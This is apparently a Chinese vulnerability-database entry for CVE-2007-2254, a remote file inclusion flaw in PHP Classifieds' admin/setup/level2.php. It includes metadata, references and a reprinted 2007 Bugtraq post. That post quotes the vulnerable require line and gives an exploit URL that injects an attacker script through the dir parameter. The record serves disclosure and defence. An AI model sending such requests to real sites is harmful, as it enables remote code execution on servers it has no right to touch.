PHP Classifieds 'level2.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190833 漏洞类型 未知
发布时间 2007-04-25 更新时间 2007-04-25
CVE编号 CVE-2007-2254 CNNVD-ID CNNVD-200704-501
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86297
https://cxsecurity.com/issue/WLB-2007040125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-501
|漏洞详情
PHPClassifieds中的admin/setup/level2.php文件存在PHP远程文件包含漏洞。远程攻击者可以借助dir参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
Allfaclassfieds  (level2.php dir) remote file inclusion

--
 Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR (at) HackerMail (dot) CoM [email concealed]
 ---

Script: allfaclassfieds

Download: http://scriptat.com/download.php?sid=718
 --

Bug File: level2.php

Bug code in line 4:
 require("$dir/admin/dp.php");

--

Exploit:
 http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]

-- 
_______________________________________________
Get your free email from http://www.hackermail.com
|受影响的产品
DeltaScripts PHP Classifieds 6.04
|参考资料

来源:BUGTRAQ
名称:20070422Allfaclassfieds(level2.phpdir)remotefileinclusion
链接:http://www.securityfocus.com/archive/1/archive/1/466648/100/0/threaded
来源:VIM
名称:20070425[falsebuttrue]"Allfaclassfieds"RFIno;PHPClassifiedsyes
链接:http://www.attrition.org/pipermail/vim/2007-April/001543.html
来源:XF
名称:allfaclassfieds-level2-file-include(33798)
链接:http://xforce.iss.net/xforce/xfdb/33798
来源:SREASON
名称:2618
链接:http://securityreason.com/securityalert/2618